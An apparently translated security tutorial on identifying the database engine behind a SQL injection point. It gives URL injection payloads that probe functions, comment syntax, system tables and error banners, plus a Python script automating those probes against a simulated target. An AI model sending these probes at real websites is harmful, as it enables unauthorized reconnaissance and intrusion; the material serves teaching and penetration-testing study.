0x00 Common databases
Common databases include Oracle, MySQL, SQL Server (MSSQL), Access, MongoDB and others.
Relational databases link tables to one another through foreign keys. Non-relational databases usually store data as objects, and the relationships between objects are expressed by the properties of the objects themselves.
Relational database: data organized as two-dimensional tables and the relationships between them, for example Oracle, DB2, MySQL.
Non-relational database: a store that drops much of the functionality of a traditional relational database (rarely used features are removed in exchange for a large gain in performance), for example the NoSQL family of products such as Cloudant.
0x01 Ways to tell the database type behind a SQL injection point
- 1. Use a function that exists only in one database.
- 2. Check which auxiliary symbols are accepted, such as comment characters or the statement separator used for stacked queries.
- 3. Check whether the query can be encoded (for example by building strings with CHAR()/CHR(), whose syntax differs per database).
- 4. Use the error messages the application returns.
- 5. Use other database-specific features to assist the judgement.
- 6. Check for table names or database names that exist only in one database.
- 7. Use experience from building sites and from practice (which technology stack usually pairs with which database).
0x02 Judging by database-specific functions
len() and length()
The string-length function is called len() in MSSQL (Access/Jet SQL also has Len()), while MySQL, Oracle, DB2 and Informix call it length().
If `and len('a')=1` returns the normal page, the database is probably MSSQL (or Access). If instead `and length('a')=1` returns the normal page, it is probably MySQL, Oracle, DB2 or Informix.
@@version and version()
MySQL returns the version string from both @@version and version(); MSSQL has @@version but no version() function, so @@version alone cannot separate the two. When it is unclear whether the target is MySQL or MSSQL, use version() to decide.
In MySQL `and version()>0` returns the normal page (the version string is coerced to a number). In MSSQL the same probe fails with an error because version() is not a function there.
substring() and substr()
MSSQL has substring() only, Oracle has substr() only, and MySQL accepts both.
0x03 Judging by auxiliary symbols
"/*" opens a comment in MySQL. If appending it returns an error, the injection point is not MySQL; continue with the next probe:
"--" is a comment in Oracle and MSSQL (MySQL only treats it as a comment when a space follows it). If the page returns normally, the database is one of those two; continue with the next probe:
";" separates statements. Oracle does not execute stacked queries, so if this returns an error the database is most likely Oracle.
Sometimes the two comment symbols -- and # are enough on their own to roughly confirm the database type: MSSQL uses --, MySQL uses #, and Access supports no comment syntax at all.
http://xxx.xxx.xxx/abc.asp?p=yy--   exception
http://xxx.xxx.xxx/abc.asp?p=yy#   normal   (send # URL-encoded as %23, otherwise the browser treats it as a fragment and never sends it)
Then the database is probably MySQL or Access. Since # begins a comment only in MySQL, confirm an Access guess with the `;--` probe below rather than relying on this pair alone.
Append `;--` (a semicolon followed by two hyphens) directly after the injection point, for example:
http://xxxx/article/as.asp?id=1;--   If the page returns normally, the database is MSSQL: MSSQL accepts both `;` (statement separator) and `--` (comment, so whatever the application appends after the injected value is not executed). If an error is returned, the database is almost certainly Access.
0x04 Using the database server's system variables
SQL Server has system variables and functions such as user and db_name(), which not only identify SQL Server but also disclose a lot of useful information. For example:
http://xxx.xxx.xxx/abc.asp?p=yy and user>0   the resulting error may contain MSSQL-specific content,
for example: Microsoft OLE DB Provider for SQL Server error '80040e07' (a type-conversion error: comparing the nvarchar user name with an integer fails, and the message quotes the value it could not convert).
So this probe not only tells you the database is SQL Server, it also yields the name of the user the application connects as.
0x05 Judging by the error message shown
Append a single quotation mark directly after the injection point and read the server's error message. "Microsoft JET Database Engine error '80040e14'" means the site reaches its database through the Jet engine, i.e. an Access database; an error from the SQL Server OLE DB provider or an ODBC driver points to MSSQL.
0x06 Using system tables
Access's system table is msysobjects, which the web application cannot read by default; SQL Server's system table is sysobjects, which it can. Compare the following two requests:
① http://xxx.xxx.xxx/abc.asp?p=yy and (select count(*) from sysobjects)>0
② http://xxx.xxx.xxx/abc.asp?p=yy and (select count(*) from msysobjects)>0
If the database is SQL Server, the first request must run normally and the second must fail;
if it is Access, both fail.
The same test in exists() form:
and exists (select count(*) from sysobjects)
and exists (select count(*) from msysobjects)
If the first returns the normal page it is MSSQL; if neither does, it is Access.
The first statement asks whether sysobjects holds more than zero records. A normal page means the count is above 0 and the table therefore exists; since only MSSQL has this table, the database is MSSQL. An error means it is not.
The second statement never returns the normal page, not even on Access, because by default the web application has no permission to read msysobjects. The page reports something like "Record(s) cannot be read; no read permission on 'msysobjects'", and that specific message proves the database is Access.
All of the parameters above are integers. For a character-type parameter, put a single quotation mark before the injected fragment (to close the application's own quote) and append `;--` after it.
The following lists some characteristics of each database (additions welcome):
SQL Server:
id=1 and (select count(*) from sysobjects)>0        returns normal
id=1 and (select count(*) from msysobjects)>0       returns error
id=1 and exists(select id from sysobjects)
id=1 and len(user)>0
char(97)+char(110)+char(100)+char(32)+char(49)+char(61)+char(49)   (builds the string "and 1=1"; concatenating char() with + is SQL Server syntax)
Access:
id=1 and (select count(*) from sysobjects)>0        returns error
id=1 and (select count(*) from msysobjects)>0       returns error
MySQL:
id=2 and version()>0                                returns normal
id=2 and left(version(),1)=5%23                     (first digit of the version string; %23 is the # comment)
id=2 and length(user())>0
char(97,110,100,32,49,61,49)                        (builds "and 1=1"; multi-argument char() is MySQL syntax)
Oracle:
id=1 and '1'||'1'='11'
id=1 and 0<>(select count(*) from dual)
chr(97)||chr(110)||chr(100)||chr(32)||chr(49)||chr(61)||chr(49)   (builds "and 1=1"; chr() joined with || is Oracle syntax)
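The probes from 0x02, 0x03, 0x05 and 0x06 can be sent in sequence and the candidate set narrowed after each reply. The script below is an added example, not code from the original article: it assumes a `fetch(url) -> body` callback to reach the target, and `SimulatedTarget` is a constructed stand-in (with the URL, parameter name and error bodies invented for illustration) so it runs offline. A reply identical to the unmodified page is treated as "normal"; anything else as an error.

```python
"""Probe-driven DBMS fingerprinting through an injectable GET parameter.

Added example; it is not code from the original article. It automates the
probes the article describes in 0x02 (len()/length(), version()), 0x03
(comment characters, stacked queries), 0x05 (driver error banners) and 0x06
(sysobjects), sending each one and narrowing a candidate set from the reply.
The target is reached through a fetch(url) -> body callback, which is an
assumption of this example; SimulatedTarget is a constructed stand-in so the
script runs offline.
"""
from urllib.parse import parse_qs, quote, urlparse

CANDIDATES = frozenset({"mssql", "mysql", "oracle", "access"})

# (fragment appended to the injected value, DBMSs on which the page stays normal)
PROBES = [
    (" and len('a')=1", frozenset({"mssql", "access"})),     # Jet SQL also has Len()
    (" and length('a')=1", frozenset({"mysql", "oracle"})),
    (" and version()>0", frozenset({"mysql"})),              # MSSQL has @@version only
    ("--", frozenset({"mssql", "oracle"})),                  # MySQL needs "-- " with a space
    ("#", frozenset({"mysql"})),                             # sent URL-encoded as %23
    (";--", frozenset({"mssql"})),                           # stacked statement + comment
    (" and (select count(*) from sysobjects)>0", frozenset({"mssql"})),
]

# Driver banners from 0x05: an error body that names the driver settles it.
BANNERS = {
    "Microsoft JET Database Engine": "access",
    "Microsoft OLE DB Provider for SQL Server": "mssql",
}


def build_url(base, param, value, fragment, quoted=False):
    """Append the probe fragment to the parameter value. For a string
    parameter (quoted=True) the application's own opening quote is closed
    first, as 0x06 recommends; the caller then ends the fragment with ;--."""
    injected = value + ("'" if quoted else "") + fragment
    return f"{base}?{param}={quote(injected, safe='')}"


def fingerprint(fetch, base, param, value):
    """Return (dbms or None, list of fragments sent).

    A reply identical to the unmodified page counts as "normal": the
    candidate set is intersected with the DBMSs on which the fragment is
    valid. Any other reply counts as an error and those DBMSs are removed.
    """
    baseline = fetch(build_url(base, param, value, ""))
    candidates = set(CANDIDATES)
    sent = []
    for fragment, normal_on in PROBES:
        body = fetch(build_url(base, param, value, fragment))
        sent.append(fragment)
        for banner, dbms in BANNERS.items():
            if banner in body:          # leaked driver error: no more probes needed
                return dbms, sent
        if body == baseline:
            candidates &= normal_on
        else:
            candidates -= normal_on
        if len(candidates) <= 1:
            break
    return (candidates.pop() if len(candidates) == 1 else None), sent


class SimulatedTarget:
    """Constructed stand-in for a vulnerable page (not a real site). It
    answers from the same validity table as PROBES and, when verbose_errors
    is set, leaks the raw driver error the way 0x04/0x05 describe."""

    NORMAL = "<html><body>Article 1: hello world</body></html>"
    ERRORS = {  # constructed error bodies
        "access": "Microsoft JET Database Engine error '80040e14'",
        "mssql": "Microsoft OLE DB Provider for SQL Server error '80040e14'",
        "mysql": "Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource",
        "oracle": "ORA-00933: SQL command not properly ended",
    }

    def __init__(self, dbms, param="id", value="1", verbose_errors=True):
        self.dbms, self.param, self.value = dbms, param, value
        self.verbose_errors = verbose_errors

    def fetch(self, url):
        injected = parse_qs(urlparse(url).query)[self.param][0]
        fragment = injected[len(self.value):]
        if fragment == "" or self.dbms in dict(PROBES).get(fragment, frozenset()):
            return self.NORMAL
        return self.ERRORS[self.dbms] if self.verbose_errors else "An error occurred."


if __name__ == "__main__":
    for dbms in sorted(CANDIDATES):
        for verbose in (True, False):
            target = SimulatedTarget(dbms, verbose_errors=verbose)
            result, sent = fingerprint(target.fetch, "http://xxx.xxx.xxx/abc.asp", "id", "1")
            print(f"{dbms:<7} verbose={verbose!s:<5} -> {result} after {len(sent)} probes")
```

With verbose errors the first failing probe already carries the driver banner, so MSSQL and Access are settled after two requests; with a generic error page the comment-symbol probe (`--`) is what finally separates MSSQL from Access, and `version()` separates MySQL from Oracle.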
0x07 Judging from experience
Small and medium ASP sites generally use Access; large ASP sites may use SQL Server.
ASP.NET sites mostly use SQL Server.
PHP sites generally use MySQL.
JSP sites use SQL Server or Oracle.
0x08 Reference links
https://www.jianshu.com/p/e308d96e2ecd (summary of database type identification)